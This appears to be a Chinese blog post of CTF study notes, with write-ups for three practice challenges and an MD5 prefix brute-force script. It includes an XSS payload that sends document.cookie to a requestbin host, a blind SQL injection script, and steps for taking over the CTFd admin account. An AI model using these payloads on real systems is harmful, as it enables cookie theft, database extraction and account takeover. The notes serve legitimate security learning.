记录一个求md5加密后前六位值确定的脚本
import hashlib
for i in range(1000000000):
a = hashlib.md5(str(i).encode('utf-8')).hexdigest()
if a[0:6] == '6d0bc1':
print(i)
print(a)
或者
import hashlib
a= "0123456789"
for o in a:
for p in a:
for q in a:
for r in a:
for s in a:
for t in a:
for u in a:
b = str(o)+str(p)+str(q)+str(r)+str(s)+str(t)+str(u)
md5 = hashlib.md5(b.encode('utf-8')).hexdigest()
if ((md5[0:6])=='6d0bc1'):
print (b)
ssi注入漏洞(服务端包含漏洞):
参考
题目:[BJDCTF 2nd]xss之光
.git文件泄露,GitHack获取源码:
<?php
$a = $_GET['yds_is_so_beautiful'];
echo unserialize($a);
利用php的原生类进行xss payload,用的是Exception反序列化
<?php
$a = new Exception("<script>window.location.href=\"http://http.requestbin.buuoj.cn/1nrks0e1?cookie=\"+escape(document[\"cookie\"])</script>");
echo $b = urlencode(serialize($a));
payload:
?yds_is_so_beautiful=O%3A9%3A%22Exception%22%3A7%3A%7Bs%3A10%3A%22%00%2A%00message%22%3Bs%3A115%3A%22%3Cscript%3Ewindow.location.href%3D%22http%3A%2F%2Fhttp.requestbin.buuoj.cn%2F1nrks0e1%3Fcookie%3D%22%2Bescape%28document%5B%22cookie%22%5D%29%3C%2Fscript%3E%22%3Bs%3A17%3A%22%00Exception%00string%22%3Bs%3A0%3A%22%22%3Bs%3A7%3A%22%00%2A%00code%22%3Bi%3A0%3Bs%3A7%3A%22%00%2A%00file%22%3Bs%3A52%3A%22C
抓包后,在cookie中得到flag,而且此时是已经Unicode过的,需要解一下。
题目二:[WUSTCTF2020]颜值成绩查询
经过几次测试可以发现是布尔盲注,可以用1^0,
if(length(database())>1,1,0)测试
之前做过涉及到二分法的题,
exp:
import requests
url = "http://ebf95ad7-9c24-4771-8d98-b0b14cb1b310.node3.buuoj.cn/?stunum="
result = ""
i = 0
while (True):
i = i + 1
head = 32
tail = 127
while (head < tail):
mid = (head + tail) >> 1
# payload = "if(ascii(substr(database(),%d,1))>%d,1,0)" % (i , mid)
payload = "if(ascii(substr((select/**/group_concat(table_name)from(information_schema.tables)where(table_schema=database())),%d,1))>%d,1,0)" % (
i, mid)
r = requests.get(url + payload)
r.encoding = "utf-8"
# print(url+payload)
if "your score is: 100" in r.text:
head = mid + 1
else:
# print(r.text)
tail = mid
last = result
if head != 32:
result += chr(head)
else:
break
print(result)
运行爆出来的表名很奇怪,也不知道是为什么。。。
就先这样吧,主要是学习一下这个脚本怎么写。。。
题目三:[V&N2020 公开赛]HappyCTFd
漏洞参考文章.
漏洞利用方式:
首先注册一个用户名包含空格,默认的管理员是admin,那么就可以注册一个 admin。
然后,退出登录,点重置密码。
这时候邮箱里就会收到一个url,这个url后面拼接的token实际上是属于用户名admin的
将自己注册的账号用户名修改成其他
然后点开链接修改密码,admin的密码就被修改了
(就按照上面的步骤解题就可以了)
由于访问页面后来一直返回503报错,复现有一些困难。。。
最近做的题要么就是完全看不懂,要么就是题目环境问题,要么就是照着wp一步步做都出不来,我吐了。。。
不过上面的题目和知识点中还有很多需要补充的地方。